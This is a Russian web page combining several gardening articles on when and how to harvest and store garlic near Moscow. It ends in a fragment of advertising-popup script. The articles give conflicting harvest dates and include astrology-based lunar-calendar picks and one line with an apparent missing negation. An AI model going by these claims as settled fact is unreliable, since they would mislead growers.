17 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Когда выкапывать чеснок в московской области

Сроки уборки чеснока в Московской области в 2020 году

Время на чтение: 6 минут

Чтобы сохранить урожай до следующего года и даже использовать его под посадку, следует знать, когда начинать выкапывать чеснок в Московской области в 2020 году. Сроки сбора зависят от погоды, сорта и особенностей посадки растения. Неперезревшие головки получаются крепкими, сочными, ароматными, не подвергаются гниению и грибковым поражениям.

Какие факторы влияют на сроки созревания чеснока

Для сбора хорошего урожая, длительного и качественного его хранения требуется соблюдать правила посадки и выкапывания чеснока. Сроки созревания головок во всех областях страны примерно одинаковый – конец июля или начало августа. Но опытные огородники ориентируются на климатические особенности и погодные условия своего региона.

Погодные условия

Для своевременного сбора урожая необходимо следить за погодными условиями. В умеренном климате, который действует в Московской области, чеснок созревает уже к концу июля. При этом лето должно быть теплым, с небольшим количеством осадков. Если же сезон выдался дождливым, потребуется выкопать головки раньше срока на несколько недель.

Время посадки

Различают озимый и яровой чеснок, который сажают в разное время года. Головки, которые отправляют в почву осенью, успевают укорениться еще до наступления первых заморозков. С ранней весны начинаются ростовые процессы, поэтому зрелость наступает уже к началу лета. Луковицы и зубчики получаются крупными, внешне растение отличается прямыми и высокими стеблями.

Способ посадки

Чеснок могут сажать зубчиками или целыми головками. Быстрее всего созревание проходит в первом варианте. С помощью «ленивого» способа к концу лета получаются целые кусты из нескольких луковиц. Также можно использовать соцветия, которые образуются на стрелах растения. При этом полноценную головку выкапывают только на следующий год.

Признаки созревания

Зрелость чеснока определяют по внешнему виду стеблей. В период, когда пора собирать урожай, нижние листья начинают желтеть, сохнуть, опускаться. Также можно оставить на грядке пару стрелок, которые растение выбрасывает в период цветения. Зеленые побеги становятся крепкими, трубчатыми, а семенная луковица начинает распадаться на мелкие зубчики. При солнечной погоде можно выждать еще 5–7 дней.

Перед сбором урожая рекомендуется выкопать и проверить пару головок. Зрелый чеснок имеет следующие признаки:

  • плотная и твердая головка, которая с трудом ломается;
  • головка имеет слегка фиолетовый окрас;
  • образование защитных чешуек (3 и более);
  • легкое отделение зубчиков друг от друга и от стебля.

Если выкопанный чеснок имеет длинные корни, а головка легко разламывается, чеснок переспел. В таком состоянии он быстро начнет терять вкусовые качества, не сможет долго храниться, начнет гнить изнутри.

Когда выкапывать в Подмосковье

Существуют рекомендованные сроки сбора чеснока в Московской области. Каждый год дата может меняться, поэтому огородники ориентируются на степень зрелости растения.

Озимый

В умеренном климате озимый чеснок созревает к концу июля. В Московской области вегетационный период увеличивается, из-за чего убирать его стоит на неделю позже. В зависимости от погодных условий сбор урожая проводят с 20 июля по 6 августа. Чтобы головки лучше хранились, после выкапывания их оставляют на грядке. Обсохшие луковицы собирают спустя 5–7 дней.

Яровой

Яровой чеснок созревает дольше озимого, поэтому при солнечной погоде выкапывают его спустя две недели. В Московской области сроки сдвигаются на конец августа или начало сентября. За 20 дней до предполагаемой уборки рекомендуется обильно поливать и рыхлить почву. После головки оставляют просохнуть на грядке вместе со стеблями.

Общие правила сбора

Уборка чеснока должна проходить после усыхания листьев и стеблей растения. Для сбора урожая подбирают теплый и солнечный день. Если накануне была сильная засуха, рекомендуется увлажнить почву. Сухая земля может повредить растение при вырывании или очищении его от земли. Общие правила выкапывания луковиц:

  • чтобы не оборвать стебель и не повредить зубцы, нужно рыхлить почву вилами;
  • крупный озимый чеснок следует копать лопатой;
  • луковицы тщательно очищают от налипшей земли;
  • после подсыхания чеснока ботву обрезают, а головки переносят в хорошо проветриваемое помещение.

После окончательного сбора обсохших луковиц их выкладывают одним слоем на бумагу или мешковину. В таком состоянии чеснок должен пролежать несколько недель. После корни обрезают так, чтобы не задеть донце. Для длительного хранения головки сортируются по размеру и разновидности.

Рекомендации лунного календаря

Некоторые садоводы-огородники предпочитают при посадке и сборе урожая основываться на лунном календаре. В нем учитываются циклы и фазы месяца, знаки зодиака.

Выкапывать чеснок необходимо на убывающей Луне. В день уборки Луна должна быть в Козероге, Стрельце или Весах. В таблице представлены числа, рекомендованные лунным календарем под сбор урожая в 2020 году:

июль август сентябрь
Озимый 5, 6, 7, 15, 18, 19, 23, 24, 31 1, 2, 3, 4, 11, 12, 13, 29, 10
Яровой 16, 17, 18, 19, 20, 21, 22, 23, 25, 28, 29 5, 11, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27

Способы хранения

Способов хранения чеснока множество. Среди «дедовских способов» выделяют хранение в мешках, сетках для овощей, проветриваемых ящиках. Если после сушки оставлены стебли, их можно сплести в косы или в пучок и подвесить за сухие листы в повале или кладовой. Чтобы подобрать оптимальный вариант, рекомендуется сразу испробовать несколько нетрадиционных методов.

Стеклянные банки

Очищенные и обрезанные от корней и стеблей головки отправляют в чистые стеклянные банки. Тару не нужно закрывать крышкой. Хранятся луковицы при комнатной температуре в сухом месте.

Парафин

Парафин считается одним из самых надежных методов хранения чеснока. Для этого в старой металлической посуде растапливают необходимое количество парафина. В теплую жидкость окунают головку, держа ее за пенек от стебля. Парафиновая пленка должна подсохнуть, после чего луковицы отправляют в ящики и картонные коробки и хранят в темном месте.

В земле

Чеснок считается морозостойким, поэтому многие владельцы частных домов хранят его в земле. Для этого необходимо каждую головку положить в пакетик или обернуть пищевой пленкой и закопать в сухую почву, притаптывать не надо. Глубина ямки должна быть около 40 см.

При помощи соли

Соль обладает антибактериальным эффектом и абсорбирует лишнюю влагу, поэтому в ней чеснок может храниться длительное время. Для этого стоит высыпать слой вещества на дно кастрюли или миски, выложить в ряд головки, затем снова засыпать их солью. Процедуру повторяют до полного заполнения тары.

Дополнительные советы и рекомендации

Для Московской области рекомендуется выбирать устойчивые к засухе, холодам, гнили и другим болезням сорта ярового чеснока. Хорошая урожайность у Дегтярского и Гулливера. Растение, которое высаживается в зиму, должно быть высокоурожайным, морозостойким, длительно храниться. Огородники выбирают Грибовский, Подмосковный, Любашу, Комсомолец.

После сбора чеснока, который улучшает состояние почвы, можно высадить на пустые грядки новые культуры. В этом же сезоне к осени получится собрать огурцы, редис, дайкон, салат, петрушку, укроп, рукколу и другие пряные травы.

Чтобы собранный урожай долго хранился, необходимо знать особенности и правила сбора. При выкапывании головок огородники ориентируются на погодные условия сезона, сроки высадки и сорт растения. Также важен внешний вид стеблей и луковиц зрелого чеснока.

Когда убирать чеснок в Подмосковье

От того, когда будет собран чеснок, напрямую зависит то, как хорошо и как долго он будет храниться. Часто бывает трудно угадать со временем сбора, ведь чеснок созревает именно в то время, когда в огороде больше всего работы. Но, очень важно не упустить этот важный момент, чтобы все труды не были напрасными и плоды хорошо сохранились до следующего урожая. Ниже вы увидите, когда выкапывать чеснок в московской области и как это правильно делать.

Когда убирать чеснок

Уборка чеснока напрямую зависит от погодных условий региона, времени и способа посадки. Период созревания плодов в разных регионах примерно одинаковый. Но все же, в одних областях весна более ранняя, в других, наоборот, наступает позже. От этого и зависит, когда начнется активный рост луковиц.

Также огромное значение имеют погодные условия. В умеренно теплом климате головки созревают быстрее, и уже в конце июля можно приступать к сбору урожая. Если же лето выдалось дождливым с резкими перепадами температуры, то, возможно, придется выкапывать луковицы раньше срока и оставить подсушивать в сухом помещении.

Также многое зависит от вида чеснока:

  1. Зимний чеснок (или озимый) высаживается на грядку осенью. Уже весной головки полностью созреют, и его можно будет убирать с огорода. Обычно, такой чеснок очень крупный и высокоурожайный. Его отличают по прямостоячим и высоким стеблям.
  2. Летний или яровой чеснок сажают ранней весной. Уже летом луковицы можно собирать. Этот вид не такой большой, но намного дольше храниться.

Как видите, есть множество факторов, от которых зависит срок сбора луковиц. Для того чтобы сделать это вовремя, необходимо учитывать все эти моменты.

Когда убирать озимый чеснок

Озимый чеснок полностью созревает уже к середине июля. В регионах с умеренным климатом головки необходимо убрать с грядок уже за неделю до конца месяца. В Московской области этот период может продлиться немного дольше, но не больше недели.

Когда выкапывать яровой чеснок

Такой вид, естественно, созревает дольше, чем озимый. Выкапывать яровой чеснок необходимо на 2 недели позже, чем его раннего «родственника». Обычно это время припадает на конец августа. В более холодном климате головки копают только к сентябрю. Конечно же, все зависит от погодных условий. Сроки сбора урожая каждый год могут немного отличаться. Из-за частых дождей чеснок может созреть даже в середине сентября.

Как определить полное созревание чеснока

Опытные огородники могут с легкостью определить степень зрелости плодов по внешнему виду. Признаком того, что плоды уже созрели, будут пожелтевшие и опустившиеся нижние листья. Если такое явление наблюдается ближе к концу июля, то это, конечно же, свидетельствует о зрелости плодов. Если же вы заметили сухие листья в самом разгаре вегетационного периода, то, скорее всего, чеснок болен или нуждается в поливе.

Также можно определить зрелость плодов по стрелкам, которые формируются на растениях где-то в середине июня. Чтобы чеснок все свои силы направлял на рост плодов, такие стрелки принято выламывать. Но все же, можно оставить пару штук, по которым мы и будем определять, созрели плоды или нет. У созревшего чеснока стрелка твердая и прямая. Находящаяся вверху семенная коробочка должна потрескаться, а семена показаться наружу. Именно в этот период выкапывают луковицы.

В данном случае необходимо следить за листьями и стеблями. У созревшего чеснока они засыхают и ложатся на землю. Теперь можно проверить зрелость луковицы, выкопав одну из грунта. Если она полностью созрела, вы поймете это по таким признакам:

  • плотная и твердая головка;
  • чешуйки расположены не менее чем в 3 слоя;
  • легко отделяющиеся зубцы;
  • пленка с зубцов снимается легко.

Очень важно собрать луковицы вовремя. Иначе головки могут потрескаться и обнажить зубцы. Такие плоды плохо хранятся в свежем виде. Кроме того, они не подойдут для посадки на следующий год.

Сбор урожая и хранение

За месяц до сбора урожая следует прекратить полив растений. А за 7 дней было бы хорошо немного раскопать землю возле луковиц. Таким образом, головки быстрее вызреют. Убирать плоды с огорода необходимо в теплый день.

Процесс сбора состоит из таких этапов:

  1. Плоды подкапывают при помощи вил или лопаты. Самостоятельно вырывать луковицы не рекомендуется, так как это может повредить зубцы.
  2. После этого руками снимают с луковиц остатки грунта. Ни в коем случае нельзя встряхивать или оббивать чеснок об землю.
  3. Выкопанный чеснок выкладывают рядами для дальнейшего просушивания. В таком виде луковицы должны находиться на грядке не менее 4 дней.
  4. Теперь можно обрезать сухие стебли и листья.

Некоторые огородники предпочитают сразу же убирать луковицы в специальное помещение и только там просушивают. Таким образом, можно уберечь урожай от солнечных ожогов и неожиданных дождей. Правда, в помещении головки будут подсыхать немного дольше, чем на свежем воздухе. В таком случае чеснок подсохнет примерно через 2 недели. После полного подсыхания следует обрезать и отсортировать плоды по размеру.

Кто-то плетет из луковиц вязанки и хранит в подвешенном состоянии. Другие выкладывают головки в картонные ящики и оставляют в сухом помещении. Для создания лучших условий можно переложить слои головок пергаментом. Лучшим вариантом для хранения являются плетеные корзины. В них легко попадает свежий воздух, благодаря чему луковицы дольше храниться.

Озимые сорта лучше всего хранить в погребе или холодильнике. Такие условия позволят немного продлить срок его пригодности. Яровой чеснок хранится лучше, даже в теплом помещении он не потеряет свои свойства.

Заключение

Как мы увидели, важно не только вырастить крепкие луковицы, но и вовремя их выкопать. Сроки созревания чеснока в Подмосковье могут отличаться в зависимости от сорта и погодных условий. Очень важно следить за внешним видом растений. Именно он подскажет, что пришло время для сбора урожая. Также очень важно правильно хранить выкопанные головки. Выполняя все вышеописанные правила можно продлить срок хранения головок до следующего урожая.

Когда выкапывать чеснок, посаженный под зиму

Любимый многими дачниками озимый чеснок имеет один недостаток — он плохо хранится. Но если вовремя выкапывать луковицы и правильно хранить, проблем не возникнет. Как узнать, созрел овощ или нет, и когда приступать к уборке?

Особенности озимого чеснока

Подзимние сорта высаживают зубками или воздушными бульбочками осенью, примерно за 25-30 дней до наступления холодов. Созревает овощ на следующий год, к середине лета. В отличие от яровых видов, этот чеснок с грядки убирают в разгар летнего сезона.

Различают ранние, среднеспелые и поздние сорта. Период от начала прорастания и до пожелтения пера составляет примерно 100 дней. Ранние разновидности готовы к уборке через 80-85 дней, поздние — спустя 100-115 суток.

Культура не подлежит длительному хранению, даже у самых лежких сортов срок не превышает 6 месяцев. Но это только при соблюдении температурного режима и оптимальных показателей влажности.

На хранение закладывают исключительно созревшие полноценные головки. Вот почему очень важно правильно определять степень зрелости овоща и вовремя убирать зимний чеснок на участке.

Примерные сроки уборки

Точное время, когда приходит пора выкапывать зимний чеснок, зависит от ряда факторов:

  • особенностей сорта;
  • климата местности и погоды конкретного сезона;
  • агротехники;
  • размеров зубков.

На заметку! Огородники с опытом отмечают, что в дождливое лето озимые сорта созревают быстрее. В жаркий сезон формирование головок слегка затягивается.

Быстрее зреют луковки растений, выращенных из мелких зубочков. Поэтому рекомендуется осенью разделять грядки, высаживая отдельно бульбы (для получения качественного материала), мелкие и крупные зубки.

Уборка зимнего чеснока в теплом климате южных областей возможна через 80-85 дней с момента появления первых всходов. В Подмосковье и средней полосе, на Украине, в Беларуси к выкопке приступают во второй половине июля и в начале августа. В Северо-Западном регионе (Ленобласти, Карелии, на Вологодчине) сбор сдвигается ближе к началу августа, точно так же в Сибири и на Урале.

Чтобы овощ успел вызреть до похолоданий, в Ленинградской, Архангельской, Псковской области выращивают ранние сорта. Поздние разновидности рекомендованы для посадки на юге.

Признаки зрелости чеснока

Точные сроки, когда собирать чеснок, определяют на месте, беря во внимание внешние изменения в посаженном под зиму растении. Признаки зрелости овоща:

  • в розетке не появляются новые зеленые листья;
  • нижние листовые пластины желтеют и увядают;
  • на цветоносах появляются трещинки в оболочке соцветий;
  • шейка луковицы высыхает;
  • покровные чешуи обретают характерный для сорта окрас. Особенно ярко это проявляется у головок с фиолетовыми и лиловыми прожилками, выделяющимися на белом или сером фоне.

Проще всего определить, что чеснок созрел, по цветоносам с лопающимися оболочками. Но, как известно, по правилам агротехники для получения крупных луковиц стрелки рекомендовано выламывать.

Поступают следующими образом: на грядке у 3-4 кустиков оставляют цветоносы, у всех других их выламывают. Это позволяет получать семенной материал (бульбочки) для осенней посадки, а также вовремя узнавать о созревании овоща.

Желательно не дожидаться полного пожелтения кустиков, полегания листьев на грядку, так как это означает, что овощ не только созрел, но уже и перезрел. У таких растений головки рассыпаются, покровные чешуи лопаются. Перезревшие луковицы плохо хранятся и быстро портятся.

Озимый чеснок лучше убирать с грядки на 3-4 дня раньше, чем давать овощу перезревать. Если же поправить ничего нельзя и с уборкой запоздали, зубки отправляют в переработку и используют на еду в первую очередь.

Уборка урожая

Определив, что чеснок созрел и ждет, когда его начнут вытаскивать из земли, выбирают подходящий день. Хорошо, если стоит сухая ясная погода — после выкопки головки можно разложить на просушку на грядах.

В дождливую погоду быстро выкапывают головки и укладывают их на сушку в проветриваемом сухом помещении (под навесом, в сарае, на чердаке).

Копать лучше вилами, чтобы повредить головки. Аккуратно стряхивают землю, укладывают овощ рядками на просушку. На ночь уносят с открытого воздуха под навес, днем возвращают на место. Неопытные огородники спрашивают, нужно ли мыть головки. Нет, достаточно просушить овощ и затем занести в кладовую.

Сколько сушить? Это время составляет 5-7 дней, в зависимости от температуры воздуха и состояния луковиц. Если нет возможности разложить рядами, их связывают в пучки и подвешивают к стенам или потолку. У просушенных луковок покровные чешуи шелестят, окрас полностью соответствует сортовым характеристикам.

После окончательного высыхания обрезают ботву на 5-10 см, корешки — на 2-3 см. Головки калибруют, откладывая зубки на посадку осенью, на еду, на переработку. Если предполагается хранение чеснока в косах, ботву не обрезают.

Подготовка к хранению

Вовремя собранный, просушенный и обрезанный чесночок укладывают в ящики или плетут связки, косы. Рекомендуют хранить озимые сорта холодным способом, предотвращая тем самым гниение и порчу овоща.

Нет ничего сложного в определении сроков уборки чеснока озимых сортов. Достаточно один раз выполнить рекомендации агрономов, учесть некоторые тонкости, и в следующие сезоны с уборкой пряного овоща не возникнет никаких проблем. Хороших урожаев вам!

Когда нужно выкапывать чеснок в московской области в 2018 году

Многие огородники занимаются выращиванием чеснока, так как этот овощ считается незаменимым при приготовлении многих домашних консерваций и овощных блюд. Качество чесночного урожая напрямую зависит от того, когда он был собран. Поэтому рекомендуется заранее разобраться с тем, когда лучше выкапывать чеснок в Московской области в 2018 году.

Сорта ярового чеснока для Московской области

Многие жители Московской области занимаются выращиванием яровых сортов чеснока в открытом грунте. К отличительным особенностям таких чесночных кустов относят длительность хранения собранных плодов и урожайность. Людям, которые выращивают на своих участках яровой чесночок, удается собрать более 10 кг плодов. Собранные созревшие луковицы в оптимальных условиях способны храниться до начала следующего сезона.


Выделяется три основные разновидности ярового чеснока, которые можно выращивать в Московской области.

Московский

Этот чесночный сорт относится к среднеспелым видам овощей, которые созревают в течение полутора месяцев. Главным его достоинством считают высокий уровень урожайности, который позволяет с десяти квадратных метров собрать 2-3 кг созревших луковиц. Плоды чесночка Московский имеют округлую форму, их поверхность покрыта плотной кожицей. В среднем спелая головка весит около 15 граммов.

Сорт довольно прихотлив к грунту, поэтому для его выращивания выбираются участки с почвой, которая богата на минеральные компоненты.

Также при выборе участка обращают внимание на кислотность грунта, которая не должна быть слишком низкой или высокой.

Дегтярский

Этот сорт не так давно был выведен специально для выращивания в Московской области и других регионах с похожими климатическими условиями. Он относится к видам чеснока со средним сроком созревания луковиц. Характерной особенностью Дегтярского считают цвет его листков, которые окрашены в ярко-зеленую окраску.

При выращивании чеснока в оптимальных для него условиях с десяти квадратных метров удается получить более 3 кг луковиц. Созревшие плоды состоят из 15-16 зубцов и весят около 40 граммов. Они покрыты красноватой чешуйкой с небольшими белыми полосками.

Гулливер

Гулливер считается наиболее крупным чесночным сортом, который можно выращивать в Подмосковье. Листики взрослого куста достигают 45 мм в ширину и 50-60 см в длину. При этом на одном растении формируется более десяти листков.

Однако Гулливер славится не только большими листьями, но и луковицами. В среднем масса одного поспевшего плода достигает 100 граммов. Если выращивать овощ в плодородной почве, масса луковиц увеличивается до 200-300 граммов.

Каждая головка Гулливера покрыта тремя слоями серой чешуйки, под которой находится 3-4 чесночных зубца.

Лучшие сорта озимого для Подмосковья

Некоторые огородники предпочитают заниматься выращиванием озимых сортов чеснока. От яровых они отличаются равномерным расположением зубцов в головке, крупным размером плодов и устойчивостью к распространенным болезням.

Подмосковный сорт озимого чеснока

Довольно молодой вид, который был выведен специально для выращивания в Подмосковье и в других регионах средней полосы. Взрослые листки вырастают до 50 см в высоту. Они окрашены в яркий зеленый цвет и покрыты тонким восковым слоем. Главным преимуществом Подмосковного чеснока считают его плодородность. С квадратного метра можно собрать более 2 кг луковиц.

Плоды покрыты светлой чешуей, на поверхности которой виднеются фиолетовые тонкие полоски. Каждая чесночная головка состоит из 6-8 зубцов массой около 13-15 граммов.

Грибовский 60 и юбилейные сорта

Грибовский 60 и Грибовский юбилейный относятся к быстро созревающим разновидностям чеснока. К их отличительным особенностям относят устойчивость к бактериальным болезням и наиболее распространенным вредителям.

Луковицы у таких сортов очень крупные, так как их масса достигает 50-65 граммов. При соблюдении всех агротехнических правил во время выращивания вес плодов может увеличиться до 100 граммов. Луковицы состоят из 7-10 зубков массой 5-12 граммов. Все зубцы покрыты в несколько слоев плотной, красноватой чешуей.

Озимый комсомолец

Сорт отличается морозоустойчивостью и поэтому он идеально подходит для высаживания в открытом грунте. В процессе выращивания Комсомольца кусты формируют плотные и крупные луковицы весом 30-40 граммов. Они покрыты белой чешуей, которая со временем приобретает слабый оттенок фиолетового цвета. Для полного созревания луковиц понадобится не меньше трех месяцев.

Сроки посадки и уборки чеснока в Московской области

Заниматься высаживанием озимых разновидностей чеснока рекомендуется осенью, в конце октября. Это наиболее благоприятное время для посадки, так как земля будет еще достаточно теплой, и к зиме высаженные чесночные зубцы успеют укорениться.

Время сбора созревших луковиц зависит от нескольких факторов, к которым относят климатическое особенности региона и выбранный метод высаживания.

Конечно, время созревания головок у многих сортов примерно одинаковое. Однако иногда из-за теплой погоды плоды спеют намного раньше. Поэтому прежде чем сажать овощ, рекомендуется детальнее ознакомиться со сроками высадки и уборки основных видов чеснока.

Озимый чеснок

В умеренных климатических условиях созревание озимой культуры начинается во второй половине лета. Поэтому луковицы выкапываются с грядки в конце августа или в начале сентября. Если лето очень жаркое, лучше собрать урожай на несколько недель раньше.

Яровой чеснок

Уборкой такого чесночка занимаются немного позже – во второй половине сентября. Опытные огородники советуют собирать урожай через 10-15 дней после уборки озимых луковиц. Однако точную дату сбора чеснока определить невозможно, так как все зависит от погодных условий.

Признаки созревания

Прежде чем заняться уборкой урожая, надо убедиться в том, что он полностью поспел. Для этого рекомендуется ознакомиться с основными признаками полного созревания чесночных луковиц.

Чтобы определить уровень созревания плодов, надо внимательно их осмотреть. У спелого чеснока опускаются и постепенно высыхают листки на кустах.

Чаще всего признаки созревания начинают проявляться в конце июля. Если они появились намного раньше, то это свидетельствует о наличии заболевания или вредителей. Также для определения спелости чесночка осматривают стрелки, которые появляются на кустах в начале лета. В процессе созревания они, как и листки, начинают засыхать.

Некоторые огородники для проверки спелости выкапывают из грунта несколько луковиц. Они считаются поспевшими, если:

  • пленка с поверхности зубцов снимается без затруднений;
  • головка покрыта несколькими слоями чешуи;
  • луковица твердая на ощупь.

Если выкопанные плоды будут слишком мягкими или на их поверхности отсутствует чешуя, то это свидетельствует о незрелости чеснока.

Сбор урожая и хранение

За три недели до уборки урожая рекомендуется полностью прекратить увлажнение грунта, чтобы ускорить созревание луковиц. После полного вызревания головок можно начинать собирать урожай.

Процесс уборки чесночных головок осуществляется в несколько этапов:

  • Подкапывание кустов при помощи лопаты или вил. Не стоит вырывать головки руками, так как из-за этого могут повредиться зубцы.
  • С выкопанных плодов руками осторожно снимается налипшая почва. Оббивать головки об землю или сильно встряхивать их нельзя.
  • Выкопанный урожай осторожно выкладывается в ряд на солнце для дальнейшей сушки. Чтобы чеснок полностью высох, потребуется не меньше четырех дней.
  • Высушенные листки и стебли отделяются от головок.

Озимые разновидности чеснока советуют хранить в помещениях с низкой температурой, так как в таких условиях урожай дольше не будет портиться. Яровой чеснок не такой требовательный к температуре, поэтому он хорошо хранится в теплых помещениях.

Что можно посадить после чеснока

Чеснок считают отличным предшественником для большинства овощей, однако не для самого себя. Садоводы с многолетним опытом не советуют выращивать чесночные кусты на одном и том же месте два года подряд, так как после повторной посадки урожайность ухудшается в несколько раз.

На участке, где раньше рос чеснок, советуют садить такие овощи:

  • ранние сорта картошки;
  • морковка;
  • капуста;
  • болгарский перец;
  • синенькие;
  • помидоры;
  • свекла;
  • петрушка;
  • укроп.

Лучше всего после чеснока растут растения, относящиеся к семейству пасленовых. Такие овощи полностью используют питательные компоненты, которые остались на участке, и постепенно восстанавливают плодородность почвы.

Лунный календарь

Некоторые огородники предпочитают убирать чесночный урожай по лунному календарю. С его помощью можно не только узнать информацию о сроках высадки овощей, но и разобраться, когда лучше заняться сбором созревшего урожая. Лунный календарь учитывает циклы месяца, его фазы и даже знаки зодиака.

Благодаря этому можно узнать всю необходимую информацию о новолуниях, полнолуниях и сроках перехода луны в новую фазу.

Согласно лунному календарь за 2018 год, уборкой урожая можно заниматься на протяжении августа и июля. Благоприятными датами в июле считаются 15, 16, 21, 23, 25 и 27 числа. В августе заниматься сбором чеснока лучше 10, 14, 17, и 21 числа. Неблагоприятным месяцем для выкапывания луковиц считается июнь. Если собрать урожай в начале лета, он быстрее начнет портиться и сохнуть.

Заключение

Чеснок считается довольно популярным овощем, который выращивает практически каждый огородник. Чтобы вырастить такое растение в Московской области, надо ознакомиться с наиболее подходящими сортами для этого региона и особенностями уборки поспевшего урожая.

Сроки выкапывания чеснока в Подмосковье

От времени уборки чеснока зависит длительность и качество его хранения. Зачастую бывает сложно определить оптимальное время сбора, но знать когда выкопать чеснок в Подмосковье, важно для получения богатого урожая.

Сроки выкапывания чеснока в Подмосковье

Когда проводить уборку

Сроки выкапывания чеснока зависят от следующих факторов:

  • погодных условий;
  • времени посадки;
  • способа посадки.

Период биологической спелости плодов в разных местностях страны примерно одинаковый. Различия касаются лишь погодных условий и времени установления летней температуры. Это способствует активному росту луковиц, определению времени уборки культуры.

Многое определяют погодные условия. В условиях умеренного климата головки созревают быстро, в результате сбор урожая производят уже в конце июля. Если в период выращивания культуры было много дождей, резких колебаний температур, луковицы выкапывают раньше срока, а потом досушивают в сухих помещениях.

Роль играет и вид культуры. Озимый чеснок сажают в огородные гряды осенью, до выпадения снега он успевает укорениться и начать рост. Весной у него рано происходят ростовые процессы, головки полностью созревают в начале лета. Эта разновидность формирует крупные луковицы и дает большой урожай. Отличить ее от яровой можно по высоким прямостоячим стеблям.

Яровой, или летний, чеснок высаживают весной. Он имеет укороченный вегетационный период, его убирают в конце июля. Эта разновидность обладает меньшей урожайностью, головки его мельче, чем у озимого, зато он лучше и дольше хранится.

Следует учитывать все факторы, влияющие на время сбора луковиц чеснока. Это позволяет выкопать их вовремя и без потерь.

Когда выкапывать озимый чеснок

Созревание озимого чеснока происходит в середине июля. В регионах с умеренным климатом луковицы выкапывают из грядок в районе 25 июля. В Подмосковье вегетационный период увеличивается, время уборки наступает на неделю позже.

После полного созревания головки чеснока на 5-7 дней оставляют лежать на грядке. За это время луковицы окончательно дозреют и обсохнут. Такой материал хранится без потерь.

Когда убирать яровой чеснок

Яровой чеснок растет немного дольше озимого. Его убирают на 15 дней позже.

Обычно время уборки приходится на середину или конец августа. В северных регионах с более холодным климатом головки стараются выкопать до 5 сентября. Сроки сбора урожая ежегодно немного меняют. Причина этого — дожди, способные сдвинуть время уборки даже на середину сентября.

Признаки созревания чеснока

Перед копкой чеснок не поливают

Созрел чеснок или нет, определяют по его внешнему виду: нижние листья желтеют и опускаются. Это должно происходить в июле. Если то же самое наблюдается весной или в начале лета, причина — нарушение режима поливов или воздействие вредителей.

Зрелость культуры определяют и по стрелкам, формирующимся на растении в середине июня. Их выламывают, чтобы все питательные вещества пошли на формирование луковиц. На грядке оставляют только 2-3 сигнальные стрелки, которые указываюрт, созрел чеснок или нет.

У готового к уборке чеснока стрелка твердая и прямая. Семенная коробочка вверху стрелки должна растрескаться, а семена — выглядывать наружу.

Метод определения зрелости по стрелкам приемлем только для озимого чеснока, т. к. яровой их не формирует. В данном варианте следят за листьями и стеблями. У созревшего овоща они полностью усыхают и ложатся на землю.

Спелость луковицы проверяют, выкопав одну из почвы. Для полностью созревшей характерны следующие признаки:

  • головка на ощупь плотная и твердая;
  • плод покрыт 3 и более слоями чешуек;
  • зубцы отделяются без труда;
  • покровная пленка с зубцов легко снимается.

Луковицы обязательно своевременно собирать, иначе головки растрескаются, обнажая зубцы. Такие плоды нельзя долго хранить и использовать для посадки на следующий год.

Сбор и хранение урожая

За 30 дней до уборки урожая прекращают полив растений. За неделю до сбора чеснок слегка подкапывают, что ускоряет этап созревания луковиц. Для уборки подбирают теплый солнечный день.

Последовательность уборочных работ состоит из следующих шагов:

  • Плоды подкапывают вилами или лопатами. Луковицы из земли не выдергивают: это вредит зубцам.
  • Руками освобождают луковицы от остатков грунта. Запрещается встряхивать или бить чеснок о землю: он сильно травмируется, в результате его нельзя длительно хранить.
  • Для окончательного просушивания выкопанные луковицы раскладывают жидкими рядами на 3-4 суток.
  • На четвертые сутки обрезают сухие листья и стебли чеснока, сортируют плоды по размеру и убирают на хранение.

Если после сбора урожай сразу поместить в специальное помещение для просушивания, его удастся уберечь от внезапных дождей. При этом чеснок будет сушиться до нужных кондиций не менее 2 недель.

Мелкие овощи лучше употреблять сразу. Средние и крупные плоды отлично хранятся, поэтому их оставляют на зиму.

Способы хранения выбирают разные. Чаще чеснок упаковывают в картонные коробки и держат в сухом помещении. Иногда луковицы перекладывают слоями пергамента.

Также чеснок хранят в плетеных корзинах. В них создается лучшая аэрация, урожай сохраняется практически без отходов. Среди огородников есть и те, кто плетет из луковиц вязанки и хранит урожай в подвешенном виде.

Озимые разновидности хранят в погребе или холодильнике. Яровой чеснок сохраняется лучше озимого, даже в теплом помещении он не утрачивает качества.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
